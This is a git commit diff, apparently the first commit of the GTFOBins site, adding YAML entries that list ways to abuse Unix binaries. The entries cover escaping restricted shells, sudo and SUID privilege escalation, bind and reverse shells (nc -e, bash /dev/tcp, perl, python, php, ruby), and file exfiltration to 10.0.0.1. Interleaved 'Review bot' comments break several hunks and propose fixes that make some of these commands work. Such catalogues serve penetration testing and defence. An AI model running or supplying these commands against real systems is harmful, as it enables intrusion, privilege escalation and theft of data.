commit b81e57005a8fe36a5fb537cc713147ffc68ffb30
Author: Emilio Pinna
Date: Mon May 21 20:14:41 2018 +0100
First commit
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..5d88aff
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,3 @@
+/_tmp/
+/.sass-cache/
+/_site/
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
new file mode 100644
index 0000000..2cad4c1
--- /dev/null
+++ b/CONTRIBUTING.md
@@ -0,0 +1,3 @@
+# Contributing
+
+TODO link to website URL
diff --git a/Gemfile b/Gemfile
new file mode 100644
index 0000000..e8a7006
--- /dev/null
+++ b/Gemfile
@@ -0,0 +1,3 @@
+source 'https://rubygems.org'
+
+gem 'jekyll'
diff --git a/Gemfile.lock b/Gemfile.lock
new file mode 100644
index 0000000..a29f77d
--- /dev/null
+++ b/Gemfile.lock
@@ -0,0 +1,63 @@ +GEM + remote: https://rubygems.org/ + specs: + addressable (2.5.2) + public_suffix (>= 2.0.2, < 4.0) + colorator (1.1.0) + concurrent-ruby (1.0.5) + em-websocket (0.5.1) + eventmachine (>= 0.12.9) + http_parser.rb (~> 0.6.0) + eventmachine (1.2.7) + ffi (1.9.23) + forwardable-extended (2.6.0) + http_parser.rb (0.6.0) + i18n (0.9.5) + concurrent-ruby (~> 1.0) + jekyll (3.8.1) + addressable (~> 2.4) + colorator (~> 1.0) + em-websocket (~> 0.5) + i18n (~> 0.7) + jekyll-sass-converter (~> 1.0) + jekyll-watch (~> 2.0) + kramdown (~> 1.14) + liquid (~> 4.0) + mercenary (~> 0.3.3) + pathutil (~> 0.9) + rouge (>= 1.7, < 4) + safe_yaml (~> 1.0) + jekyll-sass-converter (1.5.2) + sass (~> 3.4) + jekyll-watch (2.0.0) + listen (~> 3.0) + kramdown (1.16.2) + liquid (4.0.0) + listen (3.1.5) + rb-fsevent (~> 0.9, >= 0.9.4) + rb-inotify (~> 0.9, >= 0.9.7) + ruby_dep (~> 1.2) + mercenary (0.3.6) + pathutil (0.16.1) + forwardable-extended (~> 2.6) + public_suffix (3.0.2) + rb-fsevent (0.10.3) + rb-inotify (0.9.10) + ffi (>= 0.5.0, < 2) + rouge (3.1.1) + ruby_dep (1.5.0) + safe_yaml (1.0.4) + sass (3.5.6) + sass-listen (~> 4.0.0) + sass-listen (4.0.0) + rb-fsevent (~> 0.9, >= 0.9.4) + rb-inotify (~> 0.9, >= 0.9.7) + +PLATFORMS + ruby + +DEPENDENCIES + jekyll + +BUNDLED WITH + 1.16.1 diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..1eb5840 --- /dev/null +++ b/Makefile @@ -0,0 +1,10 @@ +.PHONY: serve bundle + +serve: + bundle exec jekyll serve + +serve-public: + bundle exec jekyll serve --host 0.0.0.0 + +bundle: + bundle install diff --git a/README.md b/README.md new file mode 100644 index 0000000..7ca02aa --- /dev/null +++ b/README.md @@ -0,0 +1,3 @@ +# GTFOBins + +TODO link to website URL diff --git a/_config.yml b/_config.yml new file mode 100644 index 0000000..ef0dac5 --- /dev/null +++ b/_config.yml 
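Review bot: The `.PHONY: serve bundle` line in the Makefile hunk omits `serve-public`, so a stray file of that name in the repo root would make the target a silent no-op; change it to `.PHONY: serve serve-public bundle`. The `serve-public` target also binds the unauthenticated Jekyll development server to `0.0.0.0`, which is presumably intended for testing from another device, but nothing in the file says so; a one-line comment above it such as `# exposes the dev server on every interface - only use on a trusted network` would keep it from being run by habit on a hostile LAN.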
@@ -0,0 +1,15 @@ +title: GTFOBins + +exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md'] + +permalink: pretty + +collections: + gtfobins: + output: true + +defaults: + - scope: + path: '_gtfobins' + values: + layout: bin diff --git a/_data/functions.yml b/_data/functions.yml new file mode 100644 index 0000000..354081e --- /dev/null +++ b/_data/functions.yml @@ -0,0 +1,39 @@ +exec-interactive: + label: Interactive + description: It executes interactive commands that may be exploited to break out from restricted shells. + +exec-non-interactive: + label: Non-interactive + description: It executes non-interactive commands that may be exploited to break out from restricted shells. + +suid-enabled: + label: SUID + description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. + +suid-limited: + label: Limited SUID + description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux. + +sudo-enabled: + label: Sudo + description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`. + +download: + label: Download + description: It can download remote files. + +upload: + label: Upload + description: It can exfiltrate files on the network. + +bind-shell: + label: Bind shell + description: It can bind a shell to a local port to allow remote network access. + +reverse-shell: + label: Reverse shell + description: It can send back a reverse shell to a listening attacker to open a remote network access. + +load-library: + label: Library load + description: It loads shared libraries that may be used to run code in the binary execution context. diff --git a/_gtfobins/awk.md b/_gtfobins/awk.md new file mode 100644 index 0000000..c0ccd9f --- /dev/null +++ b/_gtfobins/awk.md 
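Review bot: The `suid-limited` description in `_data/functions.yml` has a typo and a doubled word: "tipically" should be "typically" and "the default operating systems system shell" reads better as "the system's default shell". The `suid-enabled` and `suid-limited` entries also share an identical first sentence, so the table on the site will not tell them apart; suggest opening the limited one with `It runs with the SUID bit set but only keeps privileges when the system shell does not drop them; typically works only on Debian Linux.` so the distinction that contribute.md spells out is visible where readers look.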
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: awk 'BEGIN {system("/bin/sh")}'
+ sudo-enabled:
+ - code: sudo awk 'BEGIN {system("/bin/sh -p")}'
+ suid-limited:
+ - code: ./awk 'BEGIN {system("/bin/sh -p")}'
+---
\ No newline at end of file
diff --git a/_gtfobins/bash.md b/_gtfobins/bash.md
new file mode 100644
index 0000000..9504070
--- /dev/null
+++ b/_gtfobins/bash.md
@@ -0,0 +1,40 @@
+---
+functions:
+ exec-interactive:
+ - code: bash
+ sudo-enabled:
+ - code: sudo bash
+ suid-enabled:
+ - code: ./bash -p
+ upload:
+ - description: Send local file in the body of an HTTP POST request.
+ code: |
+ RHOST=10.0.0.1
+ RPORT=8000
+ LFILE=file_to_send
+ echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
+ - description: Send local file using a TCP connection.
+ code: |
+ RHOST=10.0.0.1
+ RPORT=8000
+ LFILE=file_to_send
+ cat $LFILE > /dev/tcp/$RHOST/$RPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ RHOST=10.0.0.1
+ RPORT=8000
+ LFILE=file_to_get
+ (echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
+ - description: Fetch remote file using a TCP connection.
+ code: |-
+ RHOST=10.0.0.1
+ RPORT=8000
+ LFILE=file_to_get
+ bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
+ reverse-shell:
+ - code: |
+ RHOST=127.0.0.1
+ RPORT=8000
+ exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
+---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
new file mode 100644
index 0000000..d4ea657
--- /dev/null
+++ b/_gtfobins/csh.md
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: csh
+ sudo-enabled:
+ - code: sudo csh
+ suid-enabled:
+ - code: ./csh -b
+---
\ No newline at end of file
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
new file mode 100644
index 0000000..05e8083
--- /dev/null
+++ b/_gtfobins/curl.md
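Review bot: The second `download` example in bash.md, `bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE`, is the interactive-shell idiom rather than a file fetch: stdin is bound to the socket, so the remote end gets to type commands into a bash whose stdout lands in `$LFILE` and whose stderr goes back over the wire. A plain copy from the device file does what the description promises, `cat < /dev/tcp/$RHOST/$RPORT > $LFILE`. Separately, the `reverse-shell` example uses `RHOST=127.0.0.1` while every other example in the file uses `10.0.0.1`; the placeholder should be the same so readers do not assume the loopback address is significant.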
@@ -0,0 +1,15 @@
+---
+functions:
+ upload:
+ - description: Send local file with an HTTP POST request.
+ code: |
+ URL=http://10.0.0.1/
+ LFILE=file_to_send
+ curl -X POST -d @$file_to_send $URL
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |-
+ export URL=http://10.0.0.1/file_to_get
+ export LFILE=file_to_get
+ curl $URL -o $LFILE
+---
\ No newline at end of file
diff --git a/_gtfobins/ed.md b/_gtfobins/ed.md
new file mode 100644
index 0000000..aeae566
--- /dev/null
+++ b/_gtfobins/ed.md
@@ -0,0 +1,15 @@
+---
+functions:
+ exec-interactive:
+ - code: |
+ ed
+ !/bin/sh
+ sudo-enabled:
+ - code: |
+ sudo ed
+ !/bin/sh
+ suid-limited:
+ - code: |-
+ ./ed
+ !/bin/sh -p
+---
\ No newline at end of file
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
new file mode 100644
index 0000000..5f7a9db
--- /dev/null
+++ b/_gtfobins/emacs.md
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: emacs -Q -nw --eval '(term "/bin/sh")'
+ sudo-enabled:
+ - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
+ suid-enabled:
+ - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
+---
\ No newline at end of file
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
new file mode 100644
index 0000000..b47eac4
--- /dev/null
+++ b/_gtfobins/env.md
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: env /bin/sh
+ sudo-enabled:
+ - code: sudo env /bin/sh
+ suid-enabled:
+ - code: ./env /bin/sh -p
+---
\ No newline at end of file
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
new file mode 100644
index 0000000..f489f86
--- /dev/null
+++ b/_gtfobins/expect.md
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: expect -c 'spawn /bin/sh;interact'
+ sudo-enabled:
+ - code: sudo expect -c 'spawn /bin/sh;interact'
+ suid-enabled:
+ - code: ./expect -c 'spawn /bin/sh -p;interact'
+---
\ No newline at end of file
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
new file mode 100644
index 0000000..be88dbf
--- /dev/null
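Review bot: The curl.md `upload` example references a variable that is never set: the line above assigns `LFILE=file_to_send`, but the command reads `curl -X POST -d @$file_to_send $URL`, so curl is handed `-d @` with an empty file name and posts nothing. It should be `curl -X POST -d @$LFILE $URL`, matching the `download` example that correctly uses `$LFILE`. The two examples also differ in using plain assignments versus `export`; curl only reads its arguments, so the `export`s in the download example are unnecessary and the two should be written the same way.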
+++ b/_gtfobins/find.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: find . -exec /bin/sh \; -quit + sudo-enabled: + - code: sudo find . -exec /bin/sh \; -quit + suid-enabled: + - code: ./find . -exec /bin/sh -p \; -quit +--- \ No newline at end of file diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md new file mode 100644 index 0000000..1c65caf --- /dev/null +++ b/_gtfobins/ftp.md @@ -0,0 +1,23 @@ +--- +functions: + exec-interactive: + - code: | + ftp + !/bin/sh + sudo-enabled: + - code: | + sudo ftp + !/bin/sh + upload: + - description: Send local file to a FTP server. + code: | + RHOST=10.0.0.1 + ftp $RHOST + put file_to_send + download: + - description: Fetch a remote file from a FTP server. + code: | + RHOST=10.0.0.1 + ftp $RHOST + get file_to_get +--- \ No newline at end of file diff --git a/_gtfobins/gdb.md b/_gtfobins/gdb.md new file mode 100644 index 0000000..c1bd0fc --- /dev/null +++ b/_gtfobins/gdb.md @@ -0,0 +1,7 @@ +--- +functions: + exec-interactive: + - code: gdb -nx -ex '!sh' -ex quit + sudo-enabled: + - code: sudo gdb -nx -ex '!sh' -ex quit +--- diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md new file mode 100644 index 0000000..a5f578e --- /dev/null +++ b/_gtfobins/ionice.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: ionice /bin/sh + sudo-enabled: + - code: sudo ionice /bin/sh + suid-enabled: + - code: ./ionice /bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/ld.so.md b/_gtfobins/ld.so.md new file mode 100644 index 0000000..9a7a5fd --- /dev/null +++ b/_gtfobins/ld.so.md @@ -0,0 +1,10 @@ +--- +description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions. +functions: + exec-interactive: + - code: /lib/ld.so /bin/sh + sudo-enabled: + - code: sudo /lib/ld.so /bin/sh + suid-enabled: + - code: ./ld.so /bin/sh -p +--- diff --git a/_gtfobins/less.md b/_gtfobins/less.md new file mode 100644 index 0000000..ac7855c --- /dev/null 
+++ b/_gtfobins/less.md @@ -0,0 +1,18 @@ +--- +functions: + exec-interactive: + - code: | + less /etc/profile + !/bin/sh + - code: | + VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile + v + sudo-enabled: + - code: | + sudo less /etc/profile + !/bin/sh + suid-limited: + - code: |- + ./less /etc/profile + !/bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/man.md b/_gtfobins/man.md new file mode 100644 index 0000000..f0d9f0c --- /dev/null +++ b/_gtfobins/man.md @@ -0,0 +1,15 @@ +--- +functions: + exec-interactive: + - code: | + man man + !/bin/sh + sudo-enabled: + - code: | + sudo man man + !/bin/sh + suid-limited: + - code: |- + ./man man + !/bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/more.md b/_gtfobins/more.md new file mode 100644 index 0000000..2986954 --- /dev/null +++ b/_gtfobins/more.md @@ -0,0 +1,15 @@ +--- +functions: + exec-interactive: + - code: | + TERM= more /etc/profile + !/bin/sh + sudo-enabled: + - code: | + TERM= sudo -E more /etc/profile + !/bin/sh + suid-limited: + - code: |- + TERM= ./more /etc/profile + !/bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md new file mode 100644 index 0000000..e427a9e --- /dev/null +++ b/_gtfobins/nc.md @@ -0,0 +1,25 @@ +--- +functions: + upload: + - description: Serve a file on a TCP port. + code: | + RHOST=10.0.0.1 + RPORT=8000 + LFILE=file_to_send + nc $RHOST $RPORT < "$LFILE" + download: + - description: Fetch remote file from a remote TCP port. + code: |- + LPORT=8000 + LFILE=file_to_get + nc -l -p $LPORT > "$LFILE" + reverse-shell: + - code: | + RHOST=10.0.0.1 + RPORT=8000 + nc -e /bin/sh $RHOST $RPORT + bind-shell: + - code: | + LPORT=8000 + nc -lp $LPORT -e /bin/sh +--- diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md new file mode 100644 index 0000000..2b7efcc --- /dev/null +++ b/_gtfobins/perl.md 
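Review bot: The more.md `sudo-enabled` example, `TERM= sudo -E more /etc/profile`, only works when the sudoers entry for the user allows preserving the environment (the `SETENV` tag or `env_reset` disabled); without that, sudo refuses `-E` outright, so the example silently depends on a non-default configuration. That condition belongs in the entry's `description` field, which contribute.md reserves for exactly such limitations, e.g. `description: Requires sudo to allow preserving the environment (SETENV), since TERM must be emptied for the escape to work.`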
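Review bot: In the nc.md hunk the descriptions are attached to the wrong sides of the connection: `nc $RHOST $RPORT < "$LFILE"` connects out to a remote listener yet is labelled "Serve a file on a TCP port", and `nc -l -p $LPORT > "$LFILE"` listens locally yet is labelled "Fetch remote file from a remote TCP port". Suggest `description: Send local file to a remote TCP listener.` for the upload entry and `description: Listen on a local TCP port and write whatever is received to a file.` for the download entry. The `-e /bin/sh` used by the `reverse-shell` and `bind-shell` examples is also not available in every netcat build (the OpenBSD variant rejects the flag), which is the kind of limitation contribute.md asks to record in the entry's `description`.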
@@ -0,0 +1,14 @@ +--- +functions: + exec-interactive: + - code: perl -e 'exec "/bin/sh";' + sudo-enabled: + - code: sudo perl -e 'exec "/bin/sh";' + suid-enabled: + - code: ./perl -e 'exec "/bin/sh";' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=12346 + perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +--- \ No newline at end of file diff --git a/_gtfobins/php.md b/_gtfobins/php.md new file mode 100644 index 0000000..ec45cf7 --- /dev/null +++ b/_gtfobins/php.md 
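Review bot: The perl.md `suid-enabled` example, `./perl -e 'exec "/bin/sh";'`, is the only `suid-enabled` entry in this commit that starts the child shell without `-p`; every other entry in that category (bash, env, find, python, rpm, strace, ...) passes it, and the project's own contribute.md explains that the classification hinges on whether the shell keeps the effective UID. If the entry was verified as-is the result presumably depends on `/bin/sh` not being bash; otherwise it should read `./perl -e 'exec "/bin/sh", "-p";'` (list form, so perl execs the shell directly instead of going through `sh -c`). The `reverse-shell` example also uses `127.0.0.1` and port `12346` where the rest of the collection uses `10.0.0.1` and `8000`; the placeholders should be uniform.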
@@ -0,0 +1,39 @@ +--- +functions: + exec-non-interactive: + - code: | + export CMD="ls /" + php -r 'system($_ENV["CMD"]);' + - code: | + export CMD="ls /" + php -r 'passthru($_ENV["CMD"]);' + - code: | + export CMD="ls /" + php -r 'print(shell_exec($_ENV["CMD"]));' + - code: | + export CMD="ls /" + php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));' + - code: | + export CMD="ls /" + php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' + - code: | + export CMD="ls /" + php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' + upload: + - description: Serve files in the local folder running an HTTP server. + code: | + LHOST=0.0.0.0 + LPORT=8888 + php -S $LHOST:$LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: |- + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=8000 + php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");' +--- \ No newline at end of file diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md new file mode 100644 index 0000000..0a679df --- /dev/null +++ b/_gtfobins/python2.md 
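Review bot: The fourth `exec-non-interactive` example in php.md will not parse: the whole `-r` argument is in single quotes, so the shell passes the backslashes through and PHP receives `print(join(\"\\n\",$r));`, which is a syntax error at the `\"`. Inside single quotes the inner double quotes need no escaping, exactly as the sibling examples (`system($_ENV["CMD"])`) already do; the line should be `php -r '$r=array(); exec($_ENV["CMD"], $r); print(join("\n",$r));'`. Worth a quick run of each `-r` snippet before merging, since a parse error here means the example never executes the command at all.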
@@ -0,0 +1,32 @@ +--- +functions: + exec-interactive: + - code: python -c 'import os; os.system("/bin/sh")' + sudo-enabled: + - code: sudo python -c 'import os; os.system("/bin/sh")' + suid-enabled: + - code: ./python -c 'import os; os.system("/bin/sh -p")' + upload: + - description: Send local file via "d" parameter of a HTTP POST request. + code: | + export URL=http://10.0.0.1/ + export LFILE=file_to_send + python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' + - description: Serve files in the local folder running an HTTP server. + code: | + export LPORT=8888 + python -m SimpleHTTPServer $LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: |- + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=8000 + python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + load-library: + - code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' +--- \ No newline at end of file diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md new file mode 100644 index 0000000..2effa86 --- /dev/null +++ b/_gtfobins/python3.md 
@@ -0,0 +1,32 @@ +--- +functions: + exec-interactive: + - code: python3 -c 'import os; os.system("/bin/sh")' + sudo-enabled: + - code: sudo python3 -c 'import os; os.system("/bin/sh")' + suid-enabled: + - code: ./python3 -c 'import os; os.system("/bin/sh -p")' + upload: + - description: Send local file via "d" parameter of a HTTP POST request. + code: | + export URL=http://10.0.0.1/ + export LFILE=file_to_send + python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' + - description: Serve files in the local folder running an HTTP server. + code: | + LPORT=8888 + python3 -m http.server $LPORT + download: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://10.0.0.1/file_to_get + export LFILE=file_to_get + python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' + reverse-shell: + - code: | + export RHOST=127.0.0.1 + export RPORT=8000 + python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + load-library: + - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' +--- diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md new file mode 100644 index 0000000..c4cb4ab --- /dev/null +++ b/_gtfobins/rpm.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: rpm --eval '%{lua:posix.exec("/bin/sh")}' + sudo-enabled: + - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' + suid-enabled: + - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' +--- \ No newline at end of file diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md new file mode 100644 index 0000000..de73d72 --- /dev/null +++ b/_gtfobins/rpmquery.md 
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
+ sudo-enabled:
+ - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
+ suid-enabled:
+ - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+---
\ No newline at end of file
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
new file mode 100644
index 0000000..9fb7b09
--- /dev/null
+++ b/_gtfobins/ruby.md
@@ -0,0 +1,19 @@
+---
+functions:
+ exec-interactive:
+ - code: ruby -e 'exec "/bin/sh"'
+ sudo-enabled:
+ - code: sudo ruby -e 'exec "/bin/sh"'
+ reverse-shell:
+ - code: |
+ export RHOST=10.0.0.1
+ export RPORT=8000
+ ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ load-library:
+ - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ upload:
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ export LPORT=8888
+ ruby -run -e httpd . -p $LPORT
+---
\ No newline at end of file
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
new file mode 100644
index 0000000..326368d
--- /dev/null
+++ b/_gtfobins/scp.md
@@ -0,0 +1,36 @@
+---
+functions:
+ exec-non-interactive:
+ - code: |
+ TF=$(mktemp)
+ CMD="touch /tmp/unrestricted"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ scp -S $TF x y:
+ sudo-enabled:
+ - code: |
+ TF=$(mktemp)
+ CMD="touch /tmp/unrestricted"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ sudo scp -S $TF x y:
+ suid-limited:
+ - code: |
+ TF=$(mktemp)
+ CMD="touch /tmp/unrestricted"
+ echo "$CMD" > "$TF"
+ chmod +x "$TF"
+ ./scp -S $TF a b:
+ upload:
+ - description: Send local file to a SSH server.
+ code: |
+ RPATH=user@10.0.0.1:~/where_to_save
+ LPATH=file_to_send
+ scp $LFILE $RPATH
+ download:
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ RPATH=user@10.0.0.1:~/file_to_get
+ LFILE=where_to_save
+ scp $RPATH $LFILE
+---
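Review bot: The scp.md `upload` example sets `LPATH=file_to_send` but then runs `scp $LFILE $RPATH`, so `$LFILE` is empty and scp is invoked with only the remote path. Rename the assignment to `LFILE=file_to_send` so it matches both the command and the `download` example directly below it, which already uses `LFILE`. The three `-S $TF` examples also leave the temporary script behind after use; appending `rm "$TF"` would keep a world-readable copy of the command from lingering in `/tmp`, though that is a tidiness point rather than a correctness one.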
diff --git a/_gtfobins/setarch.md b/_gtfobins/setarch.md
new file mode 100644
index 0000000..f7e596a
--- /dev/null
+++ b/_gtfobins/setarch.md
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: setarch $(arch) /bin/sh
+ sudo-enabled:
+ - code: setarch $(arch) /bin/sh
+ suid-enabled:
+ - code: ./setarch $(arch) /bin/sh -p
+---
\ No newline at end of file
diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md
new file mode 100644
index 0000000..b1f9767
--- /dev/null
+++ b/_gtfobins/ssh.md
@@ -0,0 +1,20 @@
+---
+functions:
+ exec-interactive:
+ - description: Reconnecting may help bypassing restricted shells.
+ code: ssh localhost /bin/bash --noprofile --norc
+ download:
+ - description: Fetch a remote file from a SSH server.
+ code: |
+ HOST=user@10.0.0.1
+ RPATH=file_to_get
+ LPATH=where_to_save
+ ssh $HOST "cat $RPATH" > $LPATH
+ upload:
+ - description: Send local file to a SSH server.
+ code: |
+ HOST=user@10.0.0.1
+ RPATH=where_to_save
+ LPATH=file_to_send
+ ssh $HOST "cat > $RPATH" < $LPATH
+---
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
new file mode 100644
index 0000000..7479a82
--- /dev/null
+++ b/_gtfobins/strace.md
@@ -0,0 +1,9 @@
+---
+functions:
+ exec-interactive:
+ - code: strace -o /dev/null /bin/sh
+ sudo-enabled:
+ - code: sudo strace -o /dev/null /bin/sh
+ suid-enabled:
+ - code: ./strace -o /dev/null /bin/sh -p
+---
\ No newline at end of file
diff --git a/_gtfobins/tar.md b/_gtfobins/tar.md
new file mode 100644
index 0000000..f9ada95
--- /dev/null
+++ b/_gtfobins/tar.md
@@ -0,0 +1,10 @@
+---
+functions:
+ exec-interactive:
+ - code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ sudo-enabled:
+ - code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
+ suid-limited:
+ - code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
+ -p"
+---
\ No newline at end of file
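Review bot: The setarch.md `sudo-enabled` example is missing the `sudo` prefix: `- code: setarch $(arch) /bin/sh` is byte-identical to the `exec-interactive` example above it and never enters the privileged context the function label promises. It should read `- code: sudo setarch $(arch) /bin/sh`, in line with every other `sudo-enabled` entry in this commit.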
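Review bot: The tar.md `suid-limited` value is a YAML plain scalar broken across two lines (`exec="/bin/sh` followed by `-p"`), which happens to fold back into `exec="/bin/sh -p"` only because YAML joins continuation lines with a single space; a future edit that re-indents or adds a colon on the second line will change the command silently. Put it on one line, or quote it explicitly with `- code: './tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"'`, so the rendered example cannot drift from what was tested.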
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md new file mode 100644 index 0000000..813d4a2 --- /dev/null +++ b/_gtfobins/taskset.md @@ -0,0 +1,9 @@ +--- +functions: + exec-interactive: + - code: taskset 1 /bin/sh + sudo-enabled: + - code: sudo taskset 1 /bin/sh + suid-enabled: + - code: ./taskset 1 /bin/sh -p +--- \ No newline at end of file diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md new file mode 100644 index 0000000..e36598f --- /dev/null +++ b/_gtfobins/tclsh.md @@ -0,0 +1,15 @@ +--- +functions: + exec-interactive: + - code: | + tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr + sudo-enabled: + - code: | + sudo tclsh + exec /bin/sh <@stdin >@stdout 2>@stderr + suid-enabled: + - code: | + ./tclsh + exec /bin/sh -p <@stdin >@stdout 2>@stderr +--- \ No newline at end of file diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md new file mode 100644 index 0000000..3240601 --- /dev/null +++ b/_gtfobins/telnet.md @@ -0,0 +1,34 @@ +--- +functions: + exec-interactive: + - code: | + RHOST=www.google.com + RPORT=80 + telnet $RHOST $RPORT + ^] + !/bin/sh + description: MacOS only. + reverse-shell: + - code: | + RHOST=127.0.0.1 + RPORT=8000 + TF=$(mktemp) + rm $TF + mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF + sudo-enabled: + - code: | + RHOST=www.google.com + RPORT=80 + sudo telnet $RHOST $RPORT + ^] + !/bin/sh + description: MacOS only. + suid-limited: + - code: | + RHOST=www.google.com + RPORT=80 + ./telnet $RHOST $RPORT + ^] + !/bin/sh + description: MacOS only. +--- diff --git 